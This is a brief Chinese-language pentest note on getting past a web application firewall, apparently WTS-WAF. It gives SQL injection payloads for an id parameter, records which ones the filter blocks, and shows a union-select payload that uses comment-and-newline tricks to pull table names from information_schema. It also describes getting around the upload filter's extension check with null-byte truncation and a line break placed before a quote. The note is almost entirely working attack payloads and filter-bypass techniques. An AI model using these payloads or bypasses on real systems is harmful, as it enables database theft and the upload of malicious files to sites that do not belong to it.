sql注入
注入点:?id=13
payload:
?id=13'+and+'1'='1--+ 拦截
?id=13'+and+1+like+1--+ 不拦截,正常回显
?id=13'+and+1+like+2--+ 不拦截,回显异常 判断存在注入
?id=-13' union select--%0a1,2,3,4,5,(select--%0atable_name from information_schema.tables where table_schema="数据库名" limit 2,1)-- 继续注入
文件上传
上面是上传后的文件名,使用00截断,下面是WTS-WAF检测的文件名,可以通过在后面的双引号前面换行来绕过后缀名检测